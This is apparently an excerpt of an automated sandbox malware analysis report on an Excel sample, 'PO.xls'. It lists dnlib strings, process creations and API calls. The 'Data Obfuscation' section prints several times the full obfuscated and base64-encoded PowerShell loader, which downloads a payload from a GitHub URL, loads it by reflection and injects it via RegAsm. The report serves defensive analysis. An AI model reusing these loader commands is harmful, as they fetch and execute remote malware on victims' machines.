                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: ~DFCE2419FB28151868.TMP.0.drInitial sample: OLE indicators vbamacros = False
                    Source: PO.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041CBE1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 10_2_0060CB44 push eax; retf 10_2_0060CB45
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 10_2_0060D0CA pushad ; ret 10_2_0060D0E5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 10_2_005FF9B1 push ecx; retf 10_2_005FF9B4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_002A4AA2 push esp; ret 14_2_002A4AB1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00457186 push ecx; ret 16_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0045E55D push esi; ret 16_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00457AA8 push eax; ret 16_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00434EB6 push ecx; ret 16_2_00434EC9

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\strmr.co@SSL\DavWWWRootJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\strmr.co@SSL\DavWWWRootJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].doc.0.drJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: C899BC08.doc.5.drJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406EEB ShellExecuteW,URLDownloadToFileW,16_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,16_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
